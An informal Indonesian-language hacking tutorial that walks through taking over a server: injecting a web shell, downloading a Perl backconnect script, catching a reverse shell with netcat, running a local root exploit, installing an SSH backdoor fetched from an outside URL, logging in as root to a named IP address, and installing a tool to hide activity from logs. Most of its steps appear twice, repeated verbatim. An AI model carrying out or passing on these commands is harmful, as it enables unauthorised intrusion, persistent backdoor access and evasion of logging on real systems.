1. Inject shell / target yang mau di root (RFI, SQLi, LFI) yang penting ketemu shell inject
2. cari writeable directory (biasa wa di /tmp) cz itu pasti writeable
3. wget backconnect.pl (perl backconnect.pl [IP] [PORT])
berikutnya, kita lakukan backconnect dari shell ke kompi qt. kenapa aq memilih backconnect,
bukan bind? karena bind terkdg tettup firewall sehingga gagal. jadi aq pilih backconnect aja, banyak berhasil.
4. set dulu netcat dalam mode listening. dalam contoh, aq ngeset ke port 6788 "nc -vlp 6788"
5. seip. next step, lakukan backconnect dengan script backconnect qt tadi. buka lagi webshell, dan jalankan perintah backconnect.
perl backconnect.txt IP 6788
6. perhatikan versi kernelnya. Yang mana? yang itu lowh. di bawah garis merah itu adalah kernel nya doi.
ato ketik aja uname -a. ntar keluar kernelnya.
7. berikutnya, cari exploit yang sesuai di http://tarantula.by.ru/localroot/
8. ok. next step. jalankan exploit. exploit harus permission executable. caranya chmod 777 brk2.cc. kemudian baru jalankan exploitnya.
chmod 777 brk2
./brk2
su
id
tunggu beberapa saat sampai menunjukkan id kita adalah root. kadang mencapai waktu yang cukup lama. sabar ya. pipis dulu biar gak bocor ntar klo kaget dpt root.
9. next, install backdoor. backdoor di gunakan sebagai pintu kita masuk lagi nanti. kita pakai sshdoor.
install sshdoor:
download dulu : lwp-download http://www.prospeedperformance.com/ssh.tar.gz
extract file : tar -zxf ssh.tar.gz
go dir : cd sshdoor
set perm executable : chmod 777 * -R
install : ./install password port => ./install hn 9657 <<< install sshdoor dengan password dengan bind ke port 9657
tunggu sampai selesai.
10. seippppppp selese sudah install sshdoor. berikutnya kita check apakah port 9657 (yg kita bind dengan sshdoor tadi lowh).
telnet ke target dengan port 9657
telnet 143.248.249.224 9657
11. Connected. tandanya port 9657 terbuka. berarti sshdoor sukses terinstall.
dari step ini, kita sudah menanam backdoor di server target. sekarang kita konek ke server target dengan ssh.
ssh 143.248.249.224 -p 9657 -l root
untuk pertama kali login, akan di mintai pengaktifan fingerprint rsa. yes aja.
ketika di mintai password, masukkan password kita tadi, yaitu hn.
12. next. rem root. ini agar kegiatan kita tidak di log dan sekaligus hidden access.
installasi:
goto /usr/bin : cd /usr/bin
download: lwp-download http://125.251.142.142/zboard/local/rem
set perm : chmod 755 rem
run : rem root
pilih mode : a
2. cari writeable directory (biasa wa di /tmp) cz itu pasti writeable
3. wget backconnect.pl (perl backconnect.pl [IP] [PORT])
berikutnya, kita lakukan backconnect dari shell ke kompi qt. kenapa aq memilih backconnect,
bukan bind? karena bind terkdg tettup firewall sehingga gagal. jadi aq pilih backconnect aja, banyak berhasil.
4. set dulu netcat dalam mode listening. dalam contoh, aq ngeset ke port 6788 "nc -vlp 6788"
5. seip. next step, lakukan backconnect dengan script backconnect qt tadi. buka lagi webshell, dan jalankan perintah backconnect.
perl backconnect.txt IP 6788
6. perhatikan versi kernelnya. Yang mana? yang itu lowh. di bawah garis merah itu adalah kernel nya doi.
ato ketik aja uname -a. ntar keluar kernelnya.
7. berikutnya, cari exploit yang sesuai di http://tarantula.by.ru/localroot/
8. ok. next step. jalankan exploit. exploit harus permission executable. caranya chmod 777 brk2.cc. kemudian baru jalankan exploitnya.
chmod 777 brk2
./brk2
su
id
tunggu beberapa saat sampai menunjukkan id kita adalah root. kadang mencapai waktu yang cukup lama. sabar ya. pipis dulu biar gak bocor ntar klo kaget dpt root.
9. next, install backdoor. backdoor di gunakan sebagai pintu kita masuk lagi nanti. kita pakai sshdoor.
install sshdoor:
download dulu : lwp-download http://www.prospeedperformance.com/ssh.tar.gz
extract file : tar -zxf ssh.tar.gz
go dir : cd sshdoor
set perm executable : chmod 777 * -R
install : ./install password port => ./install hn 9657 <<< install sshdoor dengan password dengan bind ke port 9657
tunggu sampai selesai.
10. seippppppp selese sudah install sshdoor. berikutnya kita check apakah port 9657 (yg kita bind dengan sshdoor tadi lowh).
telnet ke target dengan port 9657
telnet 143.248.249.224 9657
11. Connected. tandanya port 9657 terbuka. berarti sshdoor sukses terinstall.
dari step ini, kita sudah menanam backdoor di server target. sekarang kita konek ke server target dengan ssh.
ssh 143.248.249.224 -p 9657 -l root
untuk pertama kali login, akan di mintai pengaktifan fingerprint rsa. yes aja.
ketika di mintai password, masukkan password kita tadi, yaitu hn.
12. next. rem root. ini agar kegiatan kita tidak di log dan sekaligus hidden access.
installasi:
goto /usr/bin : cd /usr/bin
download: lwp-download http://125.251.142.142/zboard/local/rem
set perm : chmod 755 rem
run : rem root
pilih mode : a
